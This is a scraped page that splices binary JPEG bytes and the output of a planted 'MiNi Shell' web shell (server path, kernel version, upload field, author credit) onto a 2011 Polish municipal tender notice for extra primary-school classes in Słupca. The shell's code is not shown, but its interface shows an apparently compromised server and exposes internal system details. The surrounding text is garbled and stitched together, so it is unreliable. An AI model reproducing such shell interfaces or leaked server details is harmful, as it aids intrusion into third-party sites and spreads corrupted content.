JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111006/322964-N-2011.html

<p class="kh_header"><b>Słupca: Zajęcia dodatkowe w ramach projektu pn.: Indywidualizacja nauczania w klasach  od I do III szkół podstawowych na terenie Miasta Słupcy</b><br>
<b>Numer ogłoszenia: 322964 - 2011; data zamieszczenia: 06.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta w Słupcy , ul. Pułaskiego 21, 62-400 Słupca, woj. wielkopolskie, tel. 063 277 27 27.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zajęcia dodatkowe w ramach projektu pn.: Indywidualizacja nauczania w klasach  od I do III szkół podstawowych na terenie Miasta Słupcy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został podzielony na 11 części odnoszące się do rodzaju zajęć dodatkowych i miejsca ich prowadzenia (placówka oświatowa). 
Zajęcia dodatkowe, prowadzone w ramach przedmiotowego zamówienia obejmują: 
a)zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także za-grożonych ryzykiem dysleksji 
b)zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych 
c)zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy 
d)zajęcia dla dzieci ze szczególnymi zainteresowaniami matematyczno  przyrodniczymi 
e)zajęcia rozwijające zainteresowania uczniów ze zdolnościami do nauki języka angielskie-go 
f)zajęcia dla uczniów interesujących się techniką i informatyka  
g)zajęcia korekcyjno-kompensacyjne dla dzieci z wadami postawy 
h)zajęcia socjoterapeutyczne dla dzieci z zaburzoną komunikacją społeczną 
5. Zajęcia odbywać się będą w wymienionych szkołach Gminy Miejskiej Słupca: w Szkole Pod-stawowej nr 1 w Słupcy, w Szkole Podstawowej nr 3 w Słupcy
6. Zakres zamówienia obejmuje ponadto: 
a)prowadzenie zajęć pozalekcyjnych (podział godzin w zależności od części), w terminie maksy-malnym od dnia podpisania umowy do 30.06.2013r., zgodnie z harmonogramem w projekcie. 
b)dokumentowanie zajęć dodatkowych (karty czasu pracy, dzienniki zajęć, listy obecności) oraz osiągnięć uczniów (testy ewaluacyjne, ankiety) 
c)przygotowywanie sprawozdań z realizacji zajęć, 
d)prowadzenie zajęć w godzinach dostosowanych do tygodniowego rozkładu zajęć oraz obowiązu-jącego rozkładu jazdy autobusów szkolnych z uwagi na grupę dzieci dojeżdżających, 
Założenia ogólne: 
1)	Usługi powinny być prowadzone przez osoby posiadające kwalifikacje i doświadczenie w zakre-sie organizacji i przeprowadzania przedmiotowych zajęć, powinny posiadać wykształcenie peda-gogiczne. 
2)	Miejscem prowadzenia zajęć będzie teren szkoły, zgodnie z treścią zamówienia. 
3)	Godzina lekcyjna w rozumieniu zajęć szkolnych oznacza 45 minut. 

 Poszczególne części przedmiotowego zamówienia obejmują:

CZĘŚĆ Nr: 1 Zajęcia dodatkowe w Szkole Podstawowej nr 1 w Słupcy, zajęcia wyrównawcze dla uczniów z trudnościami w uczeniu się matematyki - 2 grupy w roku 2011/2012 i 2 grupy w roku 2012/2013/. Łączna liczba godzin lekcyjnych 150 w tym:
- 35 h - w okresie październik - grudzień 2011 r.
- 70 h - w okresie styczeń - grudzień 2012 r. /z wyłączeniem miesięcy: lipiec i sierpień 2012 r./
- 45 h - w okresie styczeń - czerwiec 2013 r.

CZĘŚĆ Nr: 2 Zajęcia dodatkowe w Szkole Podstawowej nr 1 w Słupcy, zajęcia dla uczniów rozwija-jących zainteresowania matematyczno-przyrodnicze - 3 grupy w roku 2011/2012 i 3 grupy w roku 2012/2013  /. Łączna liczba godzin lekcyjnych 198 w tym:
- 39 h - w okresie październik - grudzień 2011 r.
- 105 h - w okresie styczeń - grudzień 2012 r. /z wyłączeniem miesięcy: lipiec i sierpień 2012 r./
- 54 h - w okresie styczeń - czerwiec 2013 r.

CZĘŚĆ Nr: 3 Zajęcia dodatkowe w Szkole Podstawowej nr 1 w Słupcy, zajęcia socjoterapeutyczne dla uczniów- 2 grupy w roku 2011/2012 i 2 grupy w roku 2012/2013/. Łączna liczba godzin lekcyj-nych 132 w tym: 
- 26 h - w okresie październik - grudzień 2011 r.
- 70 h - w okresie styczeń - grudzień 2012 r. /z wyłączeniem miesięcy: lipiec i sierpień 2012 r./
- 36 h - w okresie styczeń - czerwiec 2013 r.

CZĘŚĆ Nr: 4 Zajęcia dodatkowe w Szkole Podstawowej nr 1 w Słupcy, zajęcia wyrównawcze w za-kresie pisania i czytania- 2 grupy w roku 2011/2012 i 2 grupy w roku 2012/2013 /. Łączna liczba go-dzin lekcyjnych 148 w tym:
- 34 h - w okresie październik - grudzień 2011 r.
- 70 h - w okresie styczeń - grudzień 2012 r. /z wyłączeniem miesięcy: lipiec i sierpień 2012 r./
- 44 h - w okresie styczeń - czerwiec 2013 r.

CZĘŚĆ Nr: 5 Zajęcia dodatkowe w Szkole Podstawowej nr 1 w Słupcy, zajęcia dla dzieci ze zdolno-ściami do nauki języka angielskiego - 1 grupa w roku 2011/2012 i 1 grupy w roku 2012/2013 /. Łącz-na liczba godzin lekcyjnych 66 w tym:
- 13 h - w okresie październik - grudzień 2011 r.
- 35 h - w okresie styczeń - grudzień 2012 r. /z wyłączeniem miesięcy: lipiec i sierpień 2012 r./
- 18 h - w okresie styczeń - czerwiec 2013 r.

CZĘŚĆ Nr: 6 Zajęcia dodatkowe w Szkole Podstawowej nr 1 w Słupcy, zajęcia gimnastyki korekcyj-nej- 3 grupy w roku 2011/2012 i 3 grupy w roku 2012/2013 /. Łączna liczba godzin lekcyjnych 198 w tym:
- 39 h - w okresie październik - grudzień 2011 r.
- 105 h - w okresie styczeń - grudzień 2012 r. /z wyłączeniem miesięcy: lipiec i sierpień 2012 r./
- 54 h - w okresie styczeń - czerwiec 2013 r.

CZĘŚĆ Nr: 7 Zajęcia dodatkowe w Szkole Podstawowej nr 1 w Słupcy, zajęcia dla uczniów interesu-jących się techniką i informatyką- 1 grupa w roku 2011/2012 i 1 grupy w roku 2012/2013 /. Łączna liczba godzin lekcyjnych 72 w tym:
- 16 h - w okresie październik - grudzień 2011 r.
- 35 h - w okresie styczeń - grudzień 2012 r. /z wyłączeniem miesięcy: lipiec i sierpień 2012 r./
- 21 h - w okresie styczeń - czerwiec 2013 r.

CZĘŚĆ Nr: 8 Zajęcia dodatkowe w Szkole Podstawowej nr 3 w Słupcy, zajęcia dla dzieci z trudno-ściami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji- 4 grupy w roku 2011/2012 i 5 grup w roku 2012/2013/. Łączna liczba godzin lekcyjnych 270 w tym:
- 65 h - w okresie październik - grudzień 2011 r.,
- 140 h - w okresie styczeń - grudzień 2012 r. /z wyłączeniem miesięcy: lipiec i sierpień 2012 r./
- 65 h - w okresie styczeń - czerwiec 2013 r.

CZĘŚĆ Nr: 9 Zajęcia dodatkowe w Szkole Podstawowej nr 3 w Słupcy, zajęcia dla dzieci z trudno-ściami w uczeniu się matematyki- 3 grupy w roku 2011/2012 i 3 grupy w roku 2012/2013 /. Łączna liczba godzin lekcyjnych 180 w tym:
- 40 h - w okresie październik - grudzień 2011 r.,
- 100 h - w okresie styczeń - grudzień 2012 r. /z wyłączeniem miesięcy: lipiec i sierpień 2012 r./
- 40 h - w okresie styczeń - czerwiec 2013 r.

CZĘŚĆ Nr: 10 Zajęcia dodatkowe w Szkole Podstawowej nr 3 w Słupcy, Zajęcia logopedyczne dla dzieci- 6 grup w roku 2011/2012 i 6 grup w roku 2012/2013/. Łączna liczba godzin lekcyjnych 360 w tym:
- 77 h - w okresie październik - grudzień 2011 r.,
- 206h - w okresie styczeń - grudzień 2012 r. /z wyłączeniem miesięcy: lipiec i sierpień 2012 r./
- 77 h - w okresie styczeń - czerwiec 2013 r.

CZĘŚĆ Nr: 11 Zajęcia dodatkowe w Szkole Podstawowej nr 3 w Słupcy, Zajęcia gimnastyki korek-cyjnej- 4 grupy w roku 2011/2012 i 4 grupy w roku 2012/2013. Łączna liczba godzin lekcyjnych 240 w tym:
- 60 h - w okresie październik - grudzień 2011 r.,
- 140 h - w okresie styczeń - grudzień 2012 r. /z wyłączeniem miesięcy: lipiec i sierpień 2012 r./
- 40 h - w okresie styczeń - czerwiec 2013 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca ubiegający się o zamówienie winien wykazać się doświadczeniem w nauczaniu w klasach I-III szkoły podstawowej od 3 do 1 roku w zależności od części zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - wykonawca ubiegający się o zamówienie musi posiadać kwalifikacje i doświad-czenie w zakresie organizacji przedmiotowych zajęć na które składa ofertę. Wykonawcy świad-czący usługi, których beneficjentami są dzieci powinni posiadać doświadczenie w pracy z dzieć-mi, doświadczenie pedagogiczne oraz odpowiednie wykształcenie. 
Wykonawcy muszą ponadto spełniać poniższe warunki dotyczące wykształcenia i doświadczenia zawodowego: 
1)	Posiadają wymagane wykształcenie i kwalifikacje zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz doświadczenie zawodowe i przedstawią w celu ich wykazania dokumenty po-twierdzające: 
- dla części 4, 8 - posiadają wykształcenie SN I-III lub wyższe licencjackie lub wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej i minimum 3 - letnie doświadczenie w nauczaniu, 
- dla części 1, 9 - posiadają wykształcenie SN I-III lub wyższe licencjackie lub wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej i minimum 3 - letnie doświadczenie w nauczaniu, 
- dla części 2, 5, 7 - posiadają wykształcenie SN I-III lub wyższe licencjackie lub wyższe magister-skie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej i minimum roczne doświadczenie w nauczaniu 
- dla części 10 - posiadają wykształcenie: studia wyższe lub podyplomowe lub kurs kwalifikacyjny w zakresie logopedii, i minimum roczne doświadczenie w pracy z dzieckiem, 
- dla części 6, 11 - posiadają kwalifikacje w zakresie wychowania fizycznego lub gimnastyki korek-cyjnej z przygotowaniem pedagogicznym, lub równoważne kursy i minimum roczne doświad-czenie w pracy z dziećmi, 
- dla części 3 - osobą posiadają kwalifikacje do prowadzenia zajęć z zakresu socjoterapii i minimum roczne doświadczenie w pracy z dziećmi.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>informacja o osobach ,które będą uczestniczyć w wykonywaniu zamówienia i ich kwalifikacjach</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miasto.slupca.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Słupcy, ul.Pułaskiego 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2011 godzina 09:00, miejsce: Urząd Miasta w Słupcy - Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com